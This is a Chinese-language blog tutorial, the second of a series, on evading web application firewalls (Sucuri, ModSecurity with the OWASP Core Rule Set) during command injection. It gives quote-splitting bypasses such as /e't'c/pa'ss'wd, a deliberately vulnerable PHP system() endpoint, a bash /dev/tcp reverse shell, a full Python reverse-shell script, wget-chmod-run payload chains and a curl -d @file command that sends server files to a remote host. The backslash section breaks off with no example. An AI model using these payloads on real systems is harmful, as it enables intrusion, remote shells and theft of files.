web应用防火墙逃逸技术(二)

阅读量    31083 | 评论 1   稿费 190

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

传送门: web应用防火墙逃逸技术(一)

前言

在第一部分中,我们已经看到了如何使用通配符绕过WAF规则,更具体地说,使用问号通配符。
显然,还有很多其他方法可以绕过WAF规则集,我认为每次攻击都有其特定的逃避技巧。
例如:在SQL注入有效内容中使用注释语法可能会绕过许多过滤器。
我的意思是使用union+select类似的东西:

/?id=1+un/**/ion+sel/**/ect+1,2,3--

这是一个很好的技术,当目标WAF处于低级别时,它可以很好地工作,并且允许星号*和连字符。
这应该只适用于SQL注入,它不能用于利用本地文件包含或远程命令执行。
如果你想联系一些waf bypass技术,最近我已经创建FluxCapacitor

https://www.hackthebox.eu/login

本文不包含解决FluxCapacitor特定场景的任何提示,但可以提高您对此技术的了解。

 

连接符

在许多编程语言中,字符串连接是一个二进制中缀运算符。
+(加)操作经常重载表示为字符串参数级联:”Hello, “ + “World”具有值”Hello, World”
在其他语言中,也有一些单独的运算符,例如:
Perl和PHP的.
Lua的..等等
例如:

$ php -r 'echo "hello"." world"."n";'
hello world
$ python -c 'print "hello" + " world"'
hello world

但如果你以为这就是连接字符串的唯一途径,那你就错了~
在几种语言中,特别是C,C ++,Python以及可以在Bash中找到的脚本语言/语法,都有一些名为string literal concatenation的含义,意思是相邻的字符串连接在一起,没有任何操作符:"Hello, " "World"具有值"Hello, World"。这不仅适用于printf和echo命令,而且适用于整个bash语法。让我们从头开始。
以下每个命令都具有相同的结果:

# echo test
# echo 't'e's't
# echo 'te'st
# echo 'te'st''
# echo 'te'''st''
# python -c 'print "te" "st"'


发生这种情况是因为所有相邻的字符串在Bash中连接在一起。
实际上'te's't'由三个字符串组成:字符串te,字符串s和字符串t。
该语法可用于绕过基于“匹配短语” 的过滤器(或WAF规则)(例如,ModSecurity中的pm操作符)。
ModSecurity中的规则SecRule ARGS "@pm passwd shadow groups".....将阻止包含passwd或shadow的所有请求。但是如果我们将它们转换为pa'ss'wd或sh'ad'ow
就像我们之前看到的SQLi语法一样,它使用注释来分割查询,在这里我们也可以使用单引号'分割文件名和系统命令并创建一组串联的字符串。
同一个命令的几个例子:

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'



现在,让我们假设您已经发现了一个对应用程序执行远程命令的url参数。如果有一条规则阻止诸如etc,passwd,shadow等等这样的短语,你可以用类似这样的方法绕过它:

curl .../?url=;+cat+/e't'c/pa'ss'wd

是时候做一些测试了!
我将使用下面的PHP代码,以测试它,像往常一样,我使用了Sucuri WAF和ModSecurity的。
大概,阅读这段代码后,你会觉得它太愚蠢和简单了,没有人不去使用PHP curl函数,而在system()函数内部使用curl,我将使用的PHP代码是:

<?php
   if ( isset($_GET['zzz']) ) {
      system('curl -v '.$_GET['zzz']);
   }

 

Sucuri WAF

我认为在这两篇文章后不久,Sucuri的某个人将会很快删除我的帐户
~但是,我发誓:我使用Sucuri WAF与我的ModSecurity进行比较,并不是因为我认为其中一个比另一个更好。
Sucuri提供了很好的服务,我将它作为示例,仅仅因为它被广泛使用,所有用户阅读本文,都可以在其Web应用程序上更好地测试这些技术。
首先,我尝试使用此PHP应用程序来获取google.com的响应主体,而不对参数的值进行编码:

curl -v 'http://test1.unicresit.it/?zzz=google.com'

它按预期工作,google.com 302页面显示,我应该跳转到www.google.de(谷歌地理定位我的服务器在Frankfurt):

现在,为了利用这个易受攻击的应用程序,我做了很多事情。其中一件事是用分号;分解curl并尝试执行其他系统命令。
当我尝试读取/etc/passwd文件时,Sucuri会探测到
例如:

curl -v 'http://test1.unicresit.it/?zzz=;+cat+/etc/passwd'

由于以下原因被Sucuri WAF阻止

阻止试图对RFI / LFI进行的检测

我认为(只是一个假设,因为用户无法看到Sucuri WAF规则的细节)
Sucuri RFI / LFI尝试规则使用了我们以前见过的“匹配短语”之类的东西,并列出了常见的路径和文件名etc/passwd。这个WAF有一个非常简约的规则集和一个非常低的级别,可以让我用两个单引号绕过这条规则!

curl -v "http://test1.unicresit.it/?zzz=;+cat+/e'tc/pass'wd"


我知道你在想什么:是否在Sucuri WAF积极保护你的应用程序的时候获取一个shell?
当然可以!
但是唯一的问题是我们不能使用netcat,因为它没有安装在目标容器上

$ curl -s "http://test1.unicresit.it/?zzz=;+which+ls"
/bin/ls
$ curl -s "http://test1.unicresit.it/?zzz=;+which+nc"
$

最简单的方法(可以被WAF阻止的特殊字符很少)就是使用bash -i命令:bash -i >& /dev/tcp/1.1.1.1/1337 0>&1,但不幸的是,使用该payload绕过所有规则集太复杂了,这意味着很难使用某些PHP, Perl或Python代码来获取它。Sucuri WAF以此原因阻止了我的尝试

检测到混淆的攻击负载

完蛋了,不是吗?
我可以尝试使用curl wget将python的反向shell上传到目标的可写目录中,而不是直接在易受攻击的参数上执行shell。首先,准备python代码:vi shell.py

#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("<my ip address>",2375));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

然后公开一个可以从目标访问的web服务器,像往常一样使用python -c SimpleHTTPServerphp -S
然后从目标网站下载shell.py文件,我已经使用了以下语法:

curl -v '.../?zzz=<myip>:2375/shell.py+-o+/tmp/shell.py'



好的,Sucuri WAF并没有阻止这个请求,但通常ModSecurity会阻止
如果你想确保绕过所有的“匹配短语”规则类型,你可以使用
wget + ip-to-long转换 + string串联
例如

.../?zzz=wg'e't 168431108 -P tmp
.../?zzz=c'hm'od 777 -R tmp
.../?zzz=/t'm'p/index.html

第一条命令wget用来下载/tmp/shell文件。
第二个用于chmod使其可执行
第三个执行它。

 

绕过ModSecurity和OWASP核心规则集

可能你认为,如果waf检测级别很低,你可以绕过OWASP核心规则集,就像我们在第一篇文章中看到的那样。
但这样基本行不通。因为有两个东西叫做normalizePathcmdLine
在ModSecurity中,它们被称为“转换函数”,用于在输入数据用于匹配之前修改输入数据(例如,运算符执行)。
ModSecurity将创建数据副本,对其进行转换,然后根据结果运行运算符。
normalizePath:从输入字符串中删除多个斜杠,目录自引用和目录反引用(输入开始时除外)。
cmdLine:将打破所有渗透者的梦想,该转换函数通过规范化参数值并触发所有规则,例如/e't'c/pa'ss'wd,被规范化为/etc/passwd,然后再进行规则触发。
它做了很多事情!比如
删除所有反斜杠
删除所有双引号"
删除所有的单引号'
删除所有插入符号^
在斜杠/前删除空格
在开括号(之前删除空格
将所有逗号,和分号;替换为空格
将所有多个空格(包括制表符,换行符等)替换为一个空格
将所有字符转换为小写
由于cmdLine转换函数的原因,规则932160阻止了所有尝试利用带有级联字符串的RCE的尝试:

Matched "Operator `PmFromFile' with parameter `unix-shell.data' against variable `ARGS:zzz' (Value: ` cat /e't'c/pa'ss'wd' )"
"o5,10v10,20t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase"
"ruleId":"932160"

我无法读取/etc/passwd,但不要绝望!
OWASP核心规则集知道公用文件,路径和命令以阻止它们,但它不能与目标应用程序的源代码执行相同的操作。
我不能使用分号;字符(这意味着我不能破坏curl语法),但是我可以使用curl来将文件泄露发送到我的远程服务器。这一招适用于paranoia level 0-3
诀窍是用POST HTTP请求将文件发送到请求主体中的远程服务器,并且curl可以通过使用data参数来完成-d:

curl -d @/<file> <remote server>

请求后,编码@%40

curl ".../?zzz=-d+%40/usr/local/.../index.php+1.1.1.1:1337"


如果目标的paranoia level设置为4,所有这些都不起作用,因为payload包含连字符,正斜杠等字符
好消息是paranoia level 4在生产环境中很难找到。

 

反斜杠是新的单引号:)

同样的技术也可以使用反斜杠字符。这不是一个串联字符串,而只是一个转义序列:

目前为止就这样了。这么长时间,感谢各位!

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多